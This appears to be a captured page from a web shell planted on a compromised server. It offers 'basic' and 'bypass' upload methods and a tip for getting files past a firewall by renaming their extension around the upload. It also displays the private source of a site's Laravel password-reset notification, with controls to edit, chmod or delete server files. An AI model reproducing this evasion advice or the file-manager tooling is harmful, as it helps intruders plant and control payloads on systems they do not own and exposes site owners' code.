Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
podio.norlys.foo
httpdocs
app
Notifications
File Content:
MailResetPasswordNotification.php
<?php namespace App\Notifications; use Illuminate\Bus\Queueable; use Illuminate\Notifications\Notification; use Illuminate\Notifications\Messages\MailMessage; class MailResetPasswordNotification extends Notification { use Queueable; /** * Create a new notification instance. * * @return void */ protected $token; public function __construct($token) { $this->token = $token; } /** * Get the notification's delivery channels. * * @param mixed $notifiable * @return array */ public function via($notifiable) { return ['mail']; } /** * Get the mail representation of the notification. * * @param mixed $notifiable * @return \Illuminate\Notifications\Messages\MailMessage */ public function toMail($notifiable) { $link = url("/password/reset/" . $this->token); return (new MailMessage) ->view('email.reset') ->from('noreply@phases.dk') ->subject('Reset your password') ->action('Reset Password', $link) ->greeting('User ID: ' . $notifiable->user_id) ; } }
Edit
Download
Unzip
Chmod
Delete